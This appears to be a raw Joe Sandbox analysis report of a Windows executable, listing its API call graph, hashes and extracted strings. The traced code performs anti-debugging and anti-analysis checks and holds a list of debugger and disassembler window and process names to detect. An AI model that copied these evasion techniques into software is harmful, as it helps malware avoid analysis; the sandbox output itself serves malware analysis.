                                                                                                                                                                        Imagebase:
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:1.7%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:32%
                                                                                                                                                                          Total number of Nodes:419
                                                                                                                                                                          Total number of Limit Nodes:9
                                                                                                                                                                          execution_graph 15190 7ff674174760 GetModuleHandleA GetProcAddress VirtualProtect VirtualProtect 15203 7ff674174220 15190->15203 15193 7ff674174809 GetCurrentThread NtSetInformationThread 15194 7ff67417481f QueryPerformanceFrequency QueryPerformanceCounter 15193->15194 15195 7ff674174840 15194->15195 15195->15195 15196 7ff674174855 QueryPerformanceCounter 15195->15196 15197 7ff674174b81 15196->15197 15199 7ff67417488e 15196->15199 15223 7ff67418c910 15197->15223 15211 7ff67418a980 15199->15211 15232 7ff67418e080 15203->15232 15206 7ff674174260 15234 7ff67418a530 15206->15234 15209 7ff67418c910 8 API calls 15210 7ff6741742ea LoadLibraryA GetProcAddress 15209->15210 15210->15193 15210->15194 15212 7ff67418a9b0 15211->15212 15213 7ff67418aa10 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 15212->15213 15215 7ff67418a9fd 15212->15215 15213->15215 15216 7ff67418aa7d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 15215->15216 15217 7ff67418aa34 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 15215->15217 15221 7ff67418aa55 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15215->15221 15216->15217 15218 7ff67418aa9a 15216->15218 15219 7ff674174b65 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15217->15219 15220 7ff67418ab0d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 15217->15220 15218->15217 15222 7ff67418aaa5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15218->15222 15219->15197 15220->15219 15221->15215 15221->15217 15222->15217 15222->15218 15224 7ff67418c919 15223->15224 15225 7ff674174b8e 15224->15225 15226 7ff67418ce0c IsProcessorFeaturePresent 15224->15226 15227 7ff67418ce24 15226->15227 15245 7ff67418cee0 RtlCaptureContext 15227->15245 15233 7ff67417422a ?_Random_device@std@ 15232->15233 15233->15206 15243 7ff674172230 _Query_perf_frequency _Query_perf_counter 15234->15243 15236 7ff674172230 2 API calls 15238 7ff67418a551 15236->15238 15237 7ff6741742da 15237->15209 15238->15236 15238->15237 15239 7ff67418a5db Sleep 15238->15239 15240 7ff67418a608 Sleep SleepEx 15238->15240 15241 7ff67418a5fa Sleep 15238->15241 15239->15238 15240->15237 15241->15238 15244 7ff674172258 15243->15244 15244->15238 15246 7ff67418cefa RtlLookupFunctionEntry 15245->15246 15247 7ff67418cf10 RtlVirtualUnwind 15246->15247 15248 7ff67418ce37 15246->15248 15247->15246 15247->15248 15249 7ff67418cdd8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15248->15249 15479 7ff674167b6f 15481 7ff674167bb6 15479->15481 15504 7ff67416fd90 15479->15504 15518 7ff67415e510 15481->15518 15488 7ff674167d35 15490 7ff674167d6b 15488->15490 15491 7ff674167d40 15488->15491 15492 7ff674167d64 15490->15492 15493 7ff674142470 __stdio_common_vsprintf 15490->15493 15491->15492 15560 7ff674142470 15491->15560 15495 7ff674167f2a 15492->15495 15564 7ff6741433a0 15492->15564 15493->15492 15498 7ff674167f65 15495->15498 15568 7ff674142e50 15495->15568 15499 7ff67418c910 8 API calls 15498->15499 15501 7ff674167fe1 15499->15501 15500 7ff674167eb0 memchr 15503 7ff674167e19 15500->15503 15502 7ff674151f40 6 API calls 15502->15503 15503->15495 15503->15500 15503->15502 15505 7ff67416fe0b 15504->15505 15506 7ff67416ff12 pow pow 15505->15506 15513 7ff67416ff61 15505->15513 15506->15513 15507 7ff67416ff9c 15508 7ff674171040 2 API calls 15507->15508 15509 7ff674170288 15508->15509 15509->15481 15510 7ff674170202 15580 7ff6741708d0 15510->15580 15511 7ff6741701ac powf 15511->15510 15512 7ff674170170 powf 15512->15510 15513->15507 15517 7ff67416ff93 15513->15517 15575 7ff674171040 15513->15575 15517->15507 15517->15510 15517->15511 15517->15512 15519 7ff67415e51d 15518->15519 15525 7ff67415e597 15518->15525 15520 7ff67415e54b 15519->15520 15521 7ff67415e5a6 15519->15521 15588 7ff67415de80 15520->15588 15608 7ff67415c350 15521->15608 15524 7ff67415e558 15526 7ff67415d470 18 API calls 15524->15526 15529 7ff67415dcc0 15525->15529 15527 7ff67415e571 15526->15527 15527->15525 15528 7ff674153280 3 API calls 15527->15528 15528->15525 15530 7ff67415dcfc 15529->15530 15531 7ff67415dd45 15529->15531 15530->15531 15534 7ff67415dcfe 15530->15534 15532 7ff674153280 3 API calls 15531->15532 15537 7ff67415dd69 15532->15537 15533 7ff67415dd30 15539 7ff67415d470 15533->15539 15534->15533 15536 7ff674153280 3 API calls 15534->15536 15535 7ff67415dda0 cosf sinf 15535->15537 15536->15533 15537->15533 15537->15535 15538 7ff674153280 3 API calls 15537->15538 15538->15537 15540 7ff67415d4f8 15539->15540 15549 7ff67415d829 15539->15549 15541 7ff67415da47 15540->15541 15542 7ff67415d511 15540->15542 15544 7ff67415c350 6 API calls 15541->15544 15545 7ff67415c350 6 API calls 15542->15545 15543 7ff67418c910 8 API calls 15546 7ff67415daeb 15543->15546 15544->15549 15551 7ff67415d536 15545->15551 15546->15488 15553 7ff674153280 15546->15553 15547 7ff67415d66b sqrtf 15547->15551 15548 7ff67415d6e0 sqrtf 15548->15551 15549->15543 15550 7ff67415d756 sqrtf 15550->15551 15551->15547 15551->15548 15551->15549 15551->15550 15552 7ff67415d7cc sqrtf 15551->15552 15552->15551 15554 7ff674153295 malloc 15553->15554 15555 7ff6741532f5 15553->15555 15554->15555 15557 7ff6741532c5 memcpy 15554->15557 15555->15488 15558 7ff6741532dd 15557->15558 15559 7ff6741532ef free 15557->15559 15558->15559 15559->15555 15638 7ff6741413d0 15560->15638 15562 7ff674142495 __stdio_common_vsprintf 15563 7ff6741424ca 15562->15563 15563->15492 15566 7ff6741433fb 15564->15566 15565 7ff6741436a3 15565->15503 15566->15565 15639 7ff674161a40 15566->15639 15569 7ff674142e88 15568->15569 15571 7ff674161a40 8 API calls 15569->15571 15572 7ff6741430d8 15569->15572 15574 7ff674142fbf 15569->15574 15570 7ff674143062 memchr 15570->15574 15571->15574 15572->15498 15573 7ff674151f40 6 API calls 15573->15574 15574->15570 15574->15572 15574->15573 15576 7ff67417104a 15575->15576 15577 7ff67417104c 15576->15577 15578 7ff6741710b8 powf 15576->15578 15579 7ff6741710f2 powf 15576->15579 15577->15517 15578->15517 15579->15517 15581 7ff6741708f1 15580->15581 15583 7ff674142470 __stdio_common_vsprintf 15581->15583 15587 7ff674170951 15581->15587 15582 7ff67418c910 8 API calls 15584 7ff6741709db 15582->15584 15585 7ff674170935 15583->15585 15584->15507 15586 7ff6741709bd atof 15585->15586 15585->15587 15586->15587 15587->15582 15589 7ff67415decf 15588->15589 15591 7ff67415e0ad 15589->15591 15599 7ff67415df4b 15589->15599 15590 7ff67415e1b2 15593 7ff67415e216 15590->15593 15598 7ff674153280 3 API calls 15590->15598 15592 7ff67415e102 15591->15592 15594 7ff674153280 3 API calls 15591->15594 15595 7ff674153280 3 API calls 15592->15595 15596 7ff67415e164 15592->15596 15593->15524 15594->15592 15595->15596 15596->15590 15597 7ff674153280 3 API calls 15596->15597 15597->15590 15598->15593 15613 7ff67415db40 15599->15613 15602 7ff67415db40 3 API calls 15603 7ff67415e00b 15602->15603 15604 7ff67415db40 3 API calls 15603->15604 15605 7ff67415e04e 15604->15605 15606 7ff67415db40 3 API calls 15605->15606 15607 7ff67415e093 15606->15607 15607->15524 15622 7ff674162cd0 15608->15622 15610 7ff67415c3d5 15610->15525 15611 7ff67415c392 15611->15610 15631 7ff6741538c0 15611->15631 15614 7ff67415db71 15613->15614 15615 7ff67415db87 15614->15615 15618 7ff67415dc48 15614->15618 15617 7ff674153280 3 API calls 15615->15617 15616 7ff67415dc46 15616->15602 15620 7ff67415db9f 15617->15620 15618->15616 15619 7ff674153280 3 API calls 15618->15619 15619->15616 15620->15616 15621 7ff674153280 3 API calls 15620->15621 15621->15620 15623 7ff674162daa 15622->15623 15625 7ff674162cea 15622->15625 15623->15611 15624 7ff674162d98 15624->15611 15625->15624 15626 7ff674162d29 malloc 15625->15626 15627 7ff674162d7a 15626->15627 15628 7ff674162d46 memcpy 15626->15628 15627->15611 15629 7ff674162d62 15628->15629 15630 7ff674162d74 free 15628->15630 15629->15630 15630->15627 15633 7ff6741538d5 malloc 15631->15633 15634 7ff674153933 15631->15634 15633->15634 15635 7ff674153904 memcpy 15633->15635 15634->15610 15636 7ff67415391b 15635->15636 15637 7ff67415392d free 15635->15637 15636->15637 15637->15634 15638->15562 15642 7ff674161a91 15639->15642 15640 7ff674162076 15640->15565 15641 7ff674161c14 15641->15640 15645 7ff67415c350 6 API calls 15641->15645 15642->15640 15643 7ff674161b88 memchr 15642->15643 15644 7ff674161bbe 15642->15644 15643->15642 15644->15641 15646 7ff674161bea memchr 15644->15646 15650 7ff674161c56 15645->15650 15646->15644 15647 7ff674162cd0 3 API calls 15648 7ff674162041 15647->15648 15648->15640 15649 7ff6741538c0 3 API calls 15648->15649 15649->15640 15650->15647 15250 7ff674171140 __acrt_iob_func 15253 7ff6741413d0 15250->15253 15252 7ff674171172 __stdio_common_vfprintf 15253->15252 15144 7ff67418a650 15145 7ff67418a68e 15144->15145 15151 7ff67418a687 15144->15151 15146 7ff67418a773 15145->15146 15150 7ff67418a6a7 15145->15150 15184 7ff674171400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 15146->15184 15148 7ff67418a6b8 15174 7ff67418cf54 15148->15174 15149 7ff67418a778 15171 7ff674171360 15149->15171 15150->15148 15150->15149 15150->15151 15153 7ff67418a717 15150->15153 15151->15151 15156 7ff67418cf54 std::_Facet_Register 4 API calls 15153->15156 15156->15151 15157 7ff67418a710 _invalid_parameter_noinfo_noreturn 15157->15153 15158 7ff67418a6d9 15158->15151 15159 7ff67418a77e 15160 7ff67418a7e4 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 15159->15160 15161 7ff67418a7d1 15159->15161 15160->15161 15162 7ff67418a8d4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 15161->15162 15165 7ff67418a870 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15161->15165 15166 7ff67418a88e 15161->15166 15168 7ff67418a843 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15161->15168 15169 7ff67418a86d 15161->15169 15163 7ff67418a90e 15162->15163 15164 7ff67418a904 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 15162->15164 15164->15163 15165->15166 15167 7ff67418a8c4 15166->15167 15170 7ff67418a89e ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15166->15170 15167->15162 15168->15161 15169->15165 15170->15166 15172 7ff67417136e Concurrency::cancel_current_task 15171->15172 15173 7ff67417137f __std_exception_copy 15172->15173 15173->15159 15175 7ff67418cf6e malloc 15174->15175 15176 7ff67418cf5f 15175->15176 15177 7ff67418a6d1 15175->15177 15176->15175 15178 7ff67418cf7e 15176->15178 15177->15157 15177->15158 15181 7ff67418cf89 15178->15181 15185 7ff67418d75c 15178->15185 15180 7ff674171360 Concurrency::cancel_current_task __std_exception_copy 15182 7ff67418cf8f free 15180->15182 15181->15180 15184->15149 15188 7ff67418d73c 15185->15188 15187 7ff67418d76a _CxxThrowException 15188->15187 15254 7ff674174bd0 IsDebuggerPresent 15255 7ff674174e91 GetCurrentProcess CheckRemoteDebuggerPresent 15254->15255 15260 7ff674174c0d 15254->15260 15256 7ff674175151 LoadLibraryA GetProcAddress GetCurrentProcess NtQueryInformationProcess 15255->15256 15262 7ff674174eb5 15255->15262 15257 7ff674175441 memset GetCurrentThread GetThreadContext 15256->15257 15265 7ff67417519e 15256->15265 15258 7ff674175644 15257->15258 15277 7ff674175476 15257->15277 15331 7ff674174300 15258->15331 15261 7ff67418a980 7 API calls 15260->15261 15264 7ff674174e75 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15261->15264 15263 7ff67418a980 7 API calls 15262->15263 15266 7ff674175135 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15263->15266 15264->15255 15265->15257 15268 7ff67418a980 7 API calls 15265->15268 15266->15256 15267 7ff6741757f4 GetCurrentProcess OpenProcessToken 15269 7ff674175864 15267->15269 15270 7ff674175811 GetTokenInformation 15267->15270 15271 7ff674175425 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15268->15271 15368 7ff674174660 15269->15368 15273 7ff674175859 CloseHandle 15270->15273 15274 7ff674175835 15270->15274 15271->15257 15272 7ff67418a980 7 API calls 15276 7ff674175628 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15272->15276 15273->15269 15274->15273 15279 7ff674175a14 CloseHandle 15274->15279 15276->15258 15277->15258 15277->15272 15277->15277 15278 7ff67418a980 7 API calls 15281 7ff6741757d8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15278->15281 15292 7ff674175a30 15279->15292 15280 7ff674175bc4 VirtualAlloc 15282 7ff674175c27 SetLastError GetLastError 15280->15282 15283 7ff674175be2 memset 15280->15283 15281->15267 15309 7ff674175c42 15282->15309 15285 7ff674175c00 15283->15285 15284 7ff674175649 15284->15267 15284->15278 15284->15284 15287 7ff674175df4 VirtualFree 15285->15287 15290 7ff674175c16 VirtualFree 15285->15290 15286 7ff6741759ed 15289 7ff67418a980 7 API calls 15286->15289 15305 7ff674175e16 15287->15305 15288 7ff67418a980 7 API calls 15294 7ff674175ba8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15288->15294 15297 7ff6741759f8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15289->15297 15290->15282 15291 7ff674175fb4 CreateToolhelp32Snapshot 15295 7ff674175fd6 Thread32First 15291->15295 15296 7ff674176077 GetTickCount 15291->15296 15292->15288 15293 7ff674175869 15293->15280 15293->15286 15293->15293 15294->15280 15299 7ff674175ff0 GetCurrentProcessId 15295->15299 15300 7ff67417606e CloseHandle 15295->15300 15298 7ff674176090 15296->15298 15297->15279 15298->15298 15301 7ff6741760a6 GetTickCount 15298->15301 15303 7ff67417605c Thread32Next 15299->15303 15304 7ff674175ffc GetCurrentThreadId 15299->15304 15300->15296 15316 7ff67417625d 15301->15316 15319 7ff6741760b7 15301->15319 15302 7ff67418a980 7 API calls 15306 7ff674175f98 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15302->15306 15303->15299 15303->15300 15304->15303 15308 7ff67417600c OpenThread 15304->15308 15305->15302 15306->15291 15307 7ff67418a980 7 API calls 15310 7ff674175dd8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15307->15310 15308->15303 15311 7ff674176021 LoadLibraryA GetProcAddress 15308->15311 15309->15291 15309->15307 15309->15309 15310->15287 15314 7ff674176053 CloseHandle 15311->15314 15315 7ff674176043 NtSetInformationThread 15311->15315 15312 7ff674176511 GetProcessHeap HeapSetInformation 15313 7ff6741766e4 VirtualAlloc 15312->15313 15326 7ff674176533 15312->15326 15317 7ff6741768ad 15313->15317 15329 7ff674176706 15313->15329 15314->15303 15315->15314 15316->15312 15322 7ff67418a980 7 API calls 15316->15322 15318 7ff67418c910 8 API calls 15317->15318 15321 7ff6741768c4 15318->15321 15320 7ff67418a980 7 API calls 15319->15320 15323 7ff674176241 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15320->15323 15325 7ff6741764f5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15322->15325 15323->15316 15324 7ff67418a980 7 API calls 15328 7ff6741766c8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15324->15328 15325->15312 15326->15324 15327 7ff67418a980 7 API calls 15330 7ff674176891 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15327->15330 15328->15313 15329->15327 15330->15317 15377 7ff67417e8b0 15331->15377 15333 7ff674174360 15334 7ff67417e8b0 9 API calls 15333->15334 15335 7ff674174386 15334->15335 15336 7ff67417e8b0 9 API calls 15335->15336 15337 7ff6741743ac 15336->15337 15338 7ff67417e8b0 9 API calls 15337->15338 15339 7ff6741743d2 15338->15339 15340 7ff67417e8b0 9 API calls 15339->15340 15341 7ff6741743f8 15340->15341 15342 7ff67417e8b0 9 API calls 15341->15342 15343 7ff67417441e 15342->15343 15344 7ff67417e8b0 9 API calls 15343->15344 15345 7ff674174447 15344->15345 15395 7ff67417e9b0 15345->15395 15347 7ff674174479 15348 7ff6741744d7 15347->15348 15351 7ff6741744bd FindWindowA 15347->15351 15349 7ff67417e8b0 9 API calls 15348->15349 15350 7ff67417450f 15349->15350 15352 7ff67417e8b0 9 API calls 15350->15352 15351->15347 15354 7ff674174617 15351->15354 15353 7ff674174538 15352->15353 15355 7ff67417e8b0 9 API calls 15353->15355 15416 7ff6741886f0 15354->15416 15357 7ff674174560 15355->15357 15359 7ff67417e8b0 9 API calls 15357->15359 15361 7ff674174586 15359->15361 15360 7ff67418c910 8 API calls 15362 7ff674174636 15360->15362 15363 7ff67417e9b0 20 API calls 15361->15363 15362->15284 15365 7ff6741745b6 15363->15365 15364 7ff674174609 15367 7ff6741886f0 2 API calls 15364->15367 15365->15364 15366 7ff6741745f3 FindWindowA 15365->15366 15366->15364 15366->15365 15367->15354 15369 7ff67418e080 15368->15369 15370 7ff674174670 GetCurrentProcess K32EnumProcessModules 15369->15370 15371 7ff674174730 15370->15371 15374 7ff6741746c0 15370->15374 15373 7ff67418c910 8 API calls 15371->15373 15372 7ff6741746d0 GetCurrentProcess K32GetModuleBaseNameA 15372->15374 15375 7ff674174742 15373->15375 15374->15371 15374->15372 15376 7ff674174700 _stricmp 15374->15376 15375->15293 15376->15371 15376->15374 15378 7ff67417e8d6 15377->15378 15379 7ff67417e9a0 15377->15379 15380 7ff67417e8dc memcpy 15378->15380 15388 7ff67417e8fb 15378->15388 15420 7ff674171400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 15379->15420 15380->15333 15382 7ff67417e90c 15389 7ff67418cf54 std::_Facet_Register 4 API calls 15382->15389 15383 7ff67417e9a5 15385 7ff674171360 Concurrency::cancel_current_task __std_exception_copy 15383->15385 15384 7ff67417e94d 15386 7ff67417e974 memcpy 15384->15386 15391 7ff67417e9ab 15385->15391 15386->15333 15387 7ff67417e96c 15392 7ff67418cf54 std::_Facet_Register 4 API calls 15387->15392 15388->15382 15388->15383 15388->15384 15388->15387 15390 7ff67417e922 15389->15390 15393 7ff67417e927 15390->15393 15394 7ff67417e965 _invalid_parameter_noinfo_noreturn 15390->15394 15392->15393 15393->15386 15394->15387 15398 7ff67417e9fb 15395->15398 15409 7ff67417eab8 15395->15409 15396 7ff67418c910 8 API calls 15399 7ff67417eacc 15396->15399 15397 7ff67417ea57 15403 7ff67417eaad 15397->15403 15421 7ff67417eaf0 15397->15421 15398->15397 15401 7ff67417ea4c 15398->15401 15405 7ff67417ea2d 15398->15405 15406 7ff67417eae1 15398->15406 15414 7ff67417eae6 15398->15414 15399->15347 15407 7ff67418cf54 std::_Facet_Register 4 API calls 15401->15407 15438 7ff67417ec20 15403->15438 15410 7ff67418cf54 std::_Facet_Register 4 API calls 15405->15410 15411 7ff674171360 Concurrency::cancel_current_task __std_exception_copy 15406->15411 15412 7ff67417ea37 15407->15412 15409->15396 15413 7ff67417ea32 15410->15413 15411->15414 15412->15397 15413->15412 15415 7ff67417ea45 _invalid_parameter_noinfo_noreturn 15413->15415 15446 7ff6741886d0 ?_Xlength_error@std@@YAXPEBD 15414->15446 15415->15401 15417 7ff674188701 15416->15417 15418 7ff674174624 15416->15418 15419 7ff67417ec20 2 API calls 15417->15419 15418->15360 15419->15418 15420->15383 15422 7ff67417eb1e 15421->15422 15423 7ff67417ebf9 15422->15423 15430 7ff67417eb34 15422->15430 15447 7ff674171400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 15423->15447 15425 7ff67417eb3a 15425->15397 15426 7ff67417ebfe 15431 7ff674171360 Concurrency::cancel_current_task __std_exception_copy 15426->15431 15427 7ff67417eb6a 15432 7ff67418cf54 std::_Facet_Register 4 API calls 15427->15432 15428 7ff67417ebce memcpy 15428->15397 15429 7ff67417ebc9 15433 7ff67418cf54 std::_Facet_Register 4 API calls 15429->15433 15430->15425 15430->15426 15430->15427 15430->15428 15430->15429 15434 7ff67417ec04 15431->15434 15435 7ff67417eb80 15432->15435 15433->15428 15436 7ff67417eb88 15435->15436 15437 7ff67417ebc2 _invalid_parameter_noinfo_noreturn 15435->15437 15436->15428 15437->15429 15439 7ff67417ec8e 15438->15439 15440 7ff67417ec25 15438->15440 15439->15409 15440->15439 15441 7ff67417ec9e _invalid_parameter_noinfo_noreturn 15440->15441 15448 7ff67418cd60 15440->15448 15443 7ff67417ecbc 15441->15443 15443->15409 15444 7ff67418874b 15443->15444 15445 7ff67417ec20 free 15443->15445 15444->15409 15445->15444 15447->15426 15449 7ff67418cf90 free 15448->15449 15189 7ff674141000 GetSystemMetrics 16472 7ff674171200 16475 7ff6741413d0 16472->16475 16474 7ff674171227 __stdio_common_vsprintf 16475->16474
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
                                                                                                                                                                          • String ID: 9999999999999999$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
                                                                                                                                                                          • API String ID: 3073719868-2705509071
                                                                                                                                                                          • Opcode ID: 2586622a73164593dd59af5e73bc46dd9c19232d007e0ac099a88cbca2fd6c87
                                                                                                                                                                          • Instruction ID: c84fa44907c5fc823b9a923f78748c5e49e79b258086460ab834d744b3a17ccf
                                                                                                                                                                          • Opcode Fuzzy Hash: 2586622a73164593dd59af5e73bc46dd9c19232d007e0ac099a88cbca2fd6c87
                                                                                                                                                                          • Instruction Fuzzy Hash: 53F20327D3DB93CAF703A735A8860B4E754AFA36C0B51D337E95875A51FF2AB1818204

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
                                                                                                                                                                          • String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
                                                                                                                                                                          • API String ID: 995830000-2640589995
                                                                                                                                                                          • Opcode ID: 921764669f81edeb392265c61d5b8528d01e22cab9824b489f624638d680a8d4
                                                                                                                                                                          • Instruction ID: cac16077dde8e46e349466c73a9e940ff37e502f24c00cbd3ff3f929b7c55121
                                                                                                                                                                          • Opcode Fuzzy Hash: 921764669f81edeb392265c61d5b8528d01e22cab9824b489f624638d680a8d4
                                                                                                                                                                          • Instruction Fuzzy Hash: BBB1E327D39B82C6F703A735A846265E724AFA7780F51D333FA5872A51EF29F1818604

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965
                                                                                                                                                                          • FindWindowA.USER32 ref: 00007FF6741744BF
                                                                                                                                                                          • FindWindowA.USER32 ref: 00007FF6741745F5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
                                                                                                                                                                          • API String ID: 3370411492-2758119655
                                                                                                                                                                          • Opcode ID: 86faf16ee390c8af09e715d5af5e24c96e4af863d05e289d530ff53a92d4c083
